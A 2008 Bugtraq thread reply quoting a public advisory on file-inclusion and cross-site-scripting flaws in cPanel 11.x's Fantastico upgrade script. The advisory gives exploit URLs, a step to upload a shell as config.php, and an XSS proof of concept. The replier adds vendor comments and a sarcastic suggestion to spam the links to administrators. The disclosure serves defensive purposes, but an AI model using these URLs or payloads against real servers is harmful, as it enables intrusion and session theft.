Bugtraq mailing list archives
Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani
From: Jan van Niekerk <jvnkrk () gmail com>
Date: Thu, 20 Nov 2008 15:07:55 +0200
On Friday 31 October 2008 15:03:55 irancrash () gmail com wrote:
---------------------------------------------------------------- Script : Cpanel 11.x Type : Local File Inclusion & Cross Site Scripting Risk : High ---------------------------------------------------------------- Discovered by : Khashayar Fereidani **** I am 17 Years Old ****
Happy birthday to you.
My Official Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Local File Inclusion Vulnerability : Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and enter vulnerable address in url .... https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra de.php?action=GoAhead&scriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgra de.php?action=GoAhead&scriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrad e.php?action=GoAhead&scriptpath_show=/home/[youruser]/
According to netenberg.com there is no prospect of privilege escalation here. On their forum http://www.netenberg.com/forum/index.php?topic=6832 they say:
I do not see any reason as to why anyone would do this as they can already do the same via cPanel/SSH (this exploit will only work on the cPanel account of the person who wishes to use it; he/she cannot affect any other account on the server).
I guess they feel similarly about the cross-site scripting. You can start embedding those links in spam to your administrator now.
---------------------------------------------------------------- Cross site scripting : File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade% 20to%201.7.4 Set Action as Upgrade%20to%201.7.4 Vulnerable Variables : $localapp $updatedir $scriptpath_show $domain_show $thispage $thisapp $currentversion For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra de.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)% 3C/script%3E
Current thread:
- Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani Jan van Niekerk (Nov 20)
- <Possible follow-ups>
- Re: Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani irancrash (Nov 20)
- Re: Cpanel 11.x Local File Inclusion & Cross Site Scripting - Discovered By Khashayar Fereidani dkoston (Nov 20)